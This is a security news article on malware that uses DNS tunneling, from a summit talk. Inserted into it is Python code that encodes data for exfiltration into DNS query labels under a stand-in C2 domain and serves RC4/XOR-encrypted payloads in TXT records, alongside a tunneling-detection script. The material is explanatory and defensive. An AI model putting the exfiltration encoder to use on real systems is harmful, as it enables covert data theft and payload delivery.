CANCUN–Attackers have long used distributed denial-of-service attacks to knock domain-name servers offline, but over the last several months malware creators have taken to using DNS requests to tunnel stolen data out of networks.

Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday.

Blasco, who has identified suspicious domains before, walked the crowd through the tools in use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. These let an operator upload files, run shells, and execute PowerShell scripts that download further payloads for use in an attack.

For the attack, Blasco described an upstream channel that carries data out inside the labels of a fully qualified domain name (FQDN): under RFC 1035 a single label is at most 63 octets and the whole name at most 255 octets, which caps how much each query can smuggle. The downstream channel stores data in the records of the response: TXT records, CNAME records, NULL records and, on occasion, AAAA records.

As part of an experiment, Blasco and his team collected 50 million files containing DNS traffic, ran them through a parser, and found that many malware samples store a URL in a TXT record that tells the implant which piece of spyware or malware to deploy next.

“There’s a bunch of software that are using DNS in a weird way,” Blasco said.

One of the families they found, FeederBot, base64-encoded its DNS payload and encrypted it with RC4. Others combined base64 with XOR.
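To make the channel limits and the payload encoding concrete, here is an added example in Python; it is not code from Blasco's talk, from AlienVault, or from any of the tools named above. It models both directions: the client packs outbound bytes into base32 labels under a hypothetical attacker domain c2.example.com while honouring the 63-octet label and 255-octet name limits, and the server answers with a TXT record carrying a stage-two payload that is RC4- or XOR-encrypted and then base64-encoded, in the style of the FeederBot samples. The domain, key and payload bytes are assumptions chosen for the demonstration.

```python
import base64

# RFC 1035 limits that bound how much data one query name can carry.
MAX_LABEL = 63    # a single label is at most 63 octets
MAX_NAME = 253    # 255 wire octets minus the first length byte and the root byte
TXT_STRING = 255  # one <character-string> in a TXT RDATA holds at most 255 octets

# ---- upstream: the client smuggles data out inside query names ------------

def b32(data: bytes) -> str:
    """base32, not base64: names are case-insensitive and resolvers may fold case."""
    return base64.b32encode(data).decode().rstrip("=").lower()

def unb32(text: str) -> bytes:
    return base64.b32decode(text.upper() + "=" * (-len(text) % 8))

def build_query_name(seq: int, chunk: bytes, domain: str) -> str:
    """<seq>.<data labels>.<domain>; raises if either RFC 1035 limit is broken."""
    if not 0 <= seq <= 0xFFFF:
        raise ValueError("sequence number must fit in four hex digits")
    encoded = b32(chunk)
    labels = [f"{seq:04x}"] + [encoded[i:i + MAX_LABEL]
                               for i in range(0, len(encoded), MAX_LABEL)]
    name = ".".join(labels + [domain])
    if any(len(label) > MAX_LABEL for label in name.split(".")) or len(name) > MAX_NAME:
        raise ValueError("query name would exceed RFC 1035 limits")
    return name

def chunk_size(domain: str) -> int:
    """Largest number of raw bytes that fit in one query under this domain."""
    n = 0
    while True:
        try:
            build_query_name(0xFFFF, bytes(n + 1), domain)
        except ValueError:
            return n
        n += 1

def encode_upstream(data: bytes, domain: str) -> list[str]:
    size = chunk_size(domain)
    if size == 0:
        raise ValueError("domain leaves no room for data")
    return [build_query_name(i, data[off:off + size], domain)
            for i, off in enumerate(range(0, len(data), size))]

def decode_upstream(names: list[str], domain: str) -> bytes:
    """Server side: drop the domain, reorder by the sequence label, decode."""
    parts = {}
    for name in names:
        if not name.endswith("." + domain):
            raise ValueError(f"unexpected name {name}")
        labels = name[:-(len(domain) + 1)].split(".")
        parts[int(labels[0], 16)] = unb32("".join(labels[1:]))
    return b"".join(parts[i] for i in sorted(parts))

# ---- downstream: the server returns the next stage in a TXT record --------

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(key: bytes, data: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def build_txt_record(payload: bytes, key: bytes, cipher: str = "rc4") -> list[str]:
    """Encrypt, base64-encode, then split into 255-octet TXT strings."""
    raw = rc4(key, payload) if cipher == "rc4" else xor_bytes(key, payload)
    text = base64.b64encode(raw).decode()
    return [text[i:i + TXT_STRING] for i in range(0, len(text), TXT_STRING)]

def decode_txt_record(strings: list[str], key: bytes, cipher: str = "rc4") -> bytes:
    raw = base64.b64decode("".join(strings))
    return rc4(key, raw) if cipher == "rc4" else xor_bytes(key, raw)

if __name__ == "__main__":
    domain, key = "c2.example.com", b"demo-key"      # assumptions for the demo
    stolen = b"constructed sample: card track data\n" * 40
    queries = encode_upstream(stolen, domain)
    print(len(queries), "queries of", chunk_size(domain), "bytes; longest name",
          max(map(len, queries)), "chars")
    assert decode_upstream(queries[::-1], domain) == stolen   # order does not matter
    answer = build_txt_record(b"constructed stage-two payload", key)
    print("TXT answer:", answer)
    assert decode_txt_record(answer, key) == b"constructed stage-two payload"
```

Note how little fits per query: under a 14-character domain only 143 raw bytes survive the two limits, which is why a tunnel generates a stream of long, never-repeating names rather than a few large ones, and why every chunk needs a sequence label so the server can reassemble queries that arrive out of order.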

Blasco also stumbled upon FrameworkPOS, a fairly recent point-of-sale malware variant that was, curiously, spotted using DNS; he believes its creators were either testing DNS as a channel or had access to a company that used it. Morto, a worm that has been around for some years, and PlugX, a remote administration tool that has existed in some incarnation since 2008 but has been making a return of late, also turned up.

Blasco said that because outbound DNS is usually allowed on corporate networks, many attackers have used it to slip past simple data-loss-prevention tools such as MyDLP. Anomalies in DNS traffic are the tell, he said: unusually large content in TXT or NULL records, a spike in query volume, or queries with very long domain names and subdomains are signs that something fishy may be afoot with a system's DNS requests.
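As an added illustration of those heuristics (example code, not AlienVault's detection logic), the Python below scores a constructed resolver log, whose line format is hypothetical, on the signals Blasco listed: overlong names and labels, a high-entropy host part, oversized TXT or NULL answers, a per-minute query burst, and a high count of never-repeated names under one zone. The thresholds are assumptions; tune them against your own baseline.

```python
import math
import random
from collections import Counter, defaultdict
from datetime import datetime

# Thresholds are assumptions for this example; derive real ones from your own baseline.
MAX_NAME_LEN = 100   # characters in the whole query name
MAX_LABEL_LEN = 40   # characters in the longest label
MIN_ENTROPY = 3.5    # bits per character over the host part; encoded data runs high
MAX_RDATA = 255      # answer bytes; TXT/NULL answers this large deserve a look
BURST = 20           # queries per client, per zone, per minute
UNIQUE_NAMES = 20    # distinct names per client and zone; tunnels never repeat a name

def registered_zone(qname: str) -> str:
    """Naive 'registered domain' = last two labels (use a public-suffix list for real)."""
    return ".".join(qname.split(".")[-2:])

def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def parse_line(line: str) -> dict:
    """Hypothetical log format: <utc-timestamp> <client> <qtype> <qname> <answer-bytes>."""
    ts, client, qtype, qname, rdata = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "qtype": qtype, "qname": qname.lower().rstrip("."), "rdata": int(rdata)}

def flags_for_query(rec: dict) -> list[str]:
    """Per-query signals: long names and labels, high-entropy host part, fat answers."""
    qname, zone = rec["qname"], registered_zone(rec["qname"])
    host = qname[:-len(zone)].rstrip(".")
    reasons = []
    if len(qname) > MAX_NAME_LEN:
        reasons.append("long-name")
    if max(len(label) for label in qname.split(".")) > MAX_LABEL_LEN:
        reasons.append("long-label")
    if len(host) >= 16 and shannon_entropy(host) > MIN_ENTROPY:
        reasons.append("high-entropy")
    if rec["qtype"] in ("TXT", "NULL") and rec["rdata"] > MAX_RDATA:
        reasons.append("large-txt-or-null")
    return reasons

def detect(lines: list[str]) -> dict:
    """Aggregate per (client, zone): per-query flags plus rate and cardinality signals."""
    findings = defaultdict(set)
    per_minute = Counter()
    names_seen = defaultdict(set)
    for rec in map(parse_line, lines):
        key = (rec["client"], registered_zone(rec["qname"]))
        findings[key].update(flags_for_query(rec))
        per_minute[key + (rec["ts"].strftime("%Y-%m-%dT%H:%M"),)] += 1
        names_seen[key].add(rec["qname"])
    for (client, zone, _minute), count in per_minute.items():
        if count > BURST:
            findings[(client, zone)].add("burst")
    for key, names in names_seen.items():
        if len(names) > UNIQUE_NAMES:
            findings[key].add("unique-names")
    return {key: sorted(reasons) for key, reasons in findings.items() if reasons}

def constructed_log() -> list[str]:
    """Constructed sample (not real traffic): three ordinary lookups, then a tunnel-style burst."""
    lines = [
        "2015-02-10T09:00:01Z 10.0.0.5 A www.example.com 16",
        "2015-02-10T09:00:03Z 10.0.0.5 AAAA mail.example.com 28",
        "2015-02-10T09:00:07Z 10.0.0.9 TXT _dmarc.example.com 80",
    ]
    rng = random.Random(7)                              # seeded so the demo is reproducible
    alphabet = "abcdefghijklmnopqrstuvwxyz234567"       # base32 alphabet, as a tunnel would use
    for i in range(25):
        blob = "".join(rng.choice(alphabet) for _ in range(90))
        lines.append(f"2015-02-10T09:01:{i:02d}Z 10.0.0.7 TXT "
                     f"{i:04x}.{blob[:60]}.{blob[60:]}.t.example.net 420")
    return lines

if __name__ == "__main__":
    for key, reasons in detect(constructed_log()).items():
        print(key, "->", ", ".join(reasons))
```

Each signal alone produces false positives (CDNs and anti-spam services legitimately issue long, high-entropy names, and DKIM and SPF live in fat TXT records), so the value is in the combination per client and zone; a host tripping four or five of these at once against a domain nobody else on the network resolves is worth a packet capture.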

Categories: Malware, Security Analyst Summit, Vulnerabilities, Web Security


  1. Marc

    The fact that DNS can be seen as a connectionless transport protocol has popped up regularly since the '90s (notably: downloading code to remove the region code from DVDs).
    It is by no means new. But it always surprises me how surprised the audiences are when shown what is possible if the DNS "channel" is open.
    It was the subject of my own talk @ Hacktivity 2014 :

    The references in the above article require a special DNS service, knowledgeable of the session and presentation layer. In my own presentation I chose to focus on a more static approach, with a standard (Bind) name server on the Internet side. Check the slides to see how data leakage, file transfer in and out is as easy as 1 2 3.
    And remediation is addressed as well.
